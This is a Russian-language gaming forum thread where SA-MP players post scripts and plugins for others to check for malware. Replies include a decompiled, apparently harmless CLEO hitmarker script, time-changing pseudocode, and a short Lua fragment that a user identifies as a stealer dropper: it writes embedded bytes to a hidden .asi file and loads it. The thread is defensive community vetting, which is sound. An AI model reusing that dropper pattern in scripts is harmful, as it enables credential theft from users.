Проверка скриптов и плагинов на вредоносное ПО

lemonager

Известный
Автор темы
Всефорумный модератор
809
1,720
Версия SA-MP
  1. Любая
nX15Ep5.png

eNo5cSj.png

Общая тема для просьб о помощи проверки скриптов, плагинов и приложений.
Теперь не нужно создавать много отдельных тем о помощи с проверкой.

Рекомендации:
  1. Ставить к себе в игру что-либо с темы крайне не рекомендуется, если файл не был проверен опытным пользователем или Вы в нём сомневаетесь.
  2. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
eNo5cSj.png

qJTRxhB.png
 

антон гречка

Активный
100
54
чек

(заливаю второй раз, потому что первый раз ждал почти неделю, никто не ответил)
 

Вложения

  • AHKSupreme.luac
    92.1 KB · Просмотры: 9
  • Грустно
Реакции: Fenny

Fenny

Активный
223
77
возможно потому что говно py-декомпилятор вообще ничего не декомпилит с нормальной защитой?😯😯😯
Этим пользуюсь.
 

woodware

Потрачен
Проверенный
5,047
1,460
Этим пользуюсь.
это он и есть
 

Стэнфорд

Потрачен
1,058
543
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.

Fixsix

Потрачен
43
23
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
код:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0390: load_txd_dictionary "HitMark"
038F: load_texture "Hit1" as 25 // Load dictionary with 0390 first
03F0: enable_text_draw 1
0006: 1@ = 0
0006: 2@ = 0
0AF0: 3@ = get_int_from_ini_file "CLEO\Hitmarker.INI" section "HITMAR" key "TAILLE"
0AF0: 4@ = get_int_from_ini_file "CLEO\Hitmarker.INI" section "HITMAR" key "ANGLE"
008D: 3@ = integer 3@ to_float
008D: 4@ = integer 4@ to_float
0001: wait 2500 ms
0AF8: samp add_message_to_chat "{00FC4C} HitMarker {FFFFFF}By Gruber Loaded" color 16777215

:Noname_196
0001: wait 0 ms
0A8D: 29@ = read_memory 12010640 size 4 virtual_protect 0
000A: 29@ += 4
0A8D: 29@ = read_memory 29@ size 4 virtual_protect 0
0006: 30@ = 0

:Noname_240
0A8D: 31@ = read_memory 29@ size 1 virtual_protect 0
000A: 29@ += 1
00D6: if and
0029:   31@ >= 0
001B:   128 > 31@
004D: jump_if_false @Noname_336
005A: 31@ += 30@ // (int)
00D6: if
051A:   actor 31@ damaged_by_actor $0[3]
004D: jump_if_false @Noname_336
054E: clear_actor 31@ damage
054E: clear_actor $0[3] damage
0006: 2@ = 0
0006: 1@ = 1

:Noname_336
000A: 30@ += 256
0019:   30@ > 35584
004D: jump_if_false @Noname_240
00D6: if
0039:   1@ == 1
004D: jump_if_false @Noname_450
03E3: set_texture_to_be_drawn_antialiased 1
074B: draw_texture 25 position 339.0 179.0 scale 3@ 3@ angle 4@ color_RGBA 160 160 160 255
000A: 2@ += 1
00D6: if
0039:   2@ == 25
004D: jump_if_false @Noname_450
0006: 1@ = 0

:Noname_450
0002: jump @Noname_196
00D6: if
0AB0:   key_pressed 0@
004D: jump_if_false @Noname_542

:Noname_473
0001: wait 0 ms
0ACD: show_text_highpriority "~R~RESTART: ~w~HitMarker.CS" time 500
8AB0:   not key_pressed 0@
004D: jump_if_false @Noname_473
0A92: create_custom_thread "HitMarker.CS"
004E: end_thread

:Noname_542
0AB2: 0 ret

ЧИСТ

чек

(заливаю второй раз, потому что первый раз ждал почти неделю, никто не ответил)
Привет подгружает стиллер вот код
код:
fq = io.open("sampdebug.asi", "wb")

for slot3_a1011, slot4_a1018 in pairs(s) do
    fq:write(string.char(slot4_a1018))
end

io.close(fq)

lib, biil = loadDynamicLibrary("sampdebug.asi")

и Сам файл что подгружает
 

Вложения

  • sampdebug.asi
    13.5 KB · Просмотры: 9

Fixsix

Потрачен
43
23
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
чист
Если шо снизу псевдокод он просто откатывает время тем самым позволяя работать
код:
BOOL __stdcall StartAddress()
{
  struct _SYSTEMTIME SystemTime; // [esp+4h] [ebp-14h] BYREF

  Sleep(0x3A98u);
  GetSystemTime(&SystemTime);
  --SystemTime.wYear;
  --SystemTime.wHour;
  --SystemTime.wMinute;
  SetSystemTime(&SystemTime);
  Sleep(0x2710u);
  ++SystemTime.wYear;
  ++SystemTime.wHour;
  ++SystemTime.wMinute;
  SetSystemTime(&SystemTime);
  Sleep(0x1388u);
  return MessageBeep(0x40u);
}
 
  • Нравится
Реакции: FaNATKA gEY kLUBOV и Venti

Noname54363454

Участник
31
3
Проверте пожалуйста
Скачал сборку а там вот в мунлоадаре скрытый файл был
Заранее спасибо
 

Вложения

  • moonl.luac
    453 байт · Просмотры: 53